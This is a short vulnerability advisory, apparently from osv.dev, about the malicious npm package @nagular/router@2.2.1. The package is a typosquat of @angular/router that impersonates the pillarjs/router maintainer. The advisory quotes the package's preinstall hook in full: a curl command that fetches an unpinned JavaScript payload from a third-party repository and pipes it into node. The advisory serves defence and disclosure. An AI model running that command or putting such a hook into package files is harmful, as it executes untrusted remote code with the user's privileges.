@nagular/router@2.2.1
Vulnerability report · Last retrieved from osv.dev October 5, 2026 at 3:26 AM UTC
OSV ID
MAL-2026-17500
Ecosystem
npm
Summary
package.json declares a preinstall lifecycle hook that runs curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node, fetching an opaque JavaScript payload from an unrelated third-party repository (gitflic.ru/hellscripter/install-scripts) proxied via web.archive.org and piping it directly into node at npm install time. The fetched bytes are not pinned by hash or version, the host is unrelated to the declared repository (pillarjs/router) or publisher domain (somethingdoug.com), and execution happens automatically with full user privileges on every install. Package metadata further impersonates the maintainer of the legitimate pillarjs/router package (author: Douglas Christopher Wilson) and uses the scope @nagular/router, a name likely to be confused with @angular/router, consistent with a typosquat lure designed to trick installers into running the preinstall dropper.
Source: amazon-inspector (5db05365620b3f716b28b41577e593bc35a6699aee20090951158c206c2585ca)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.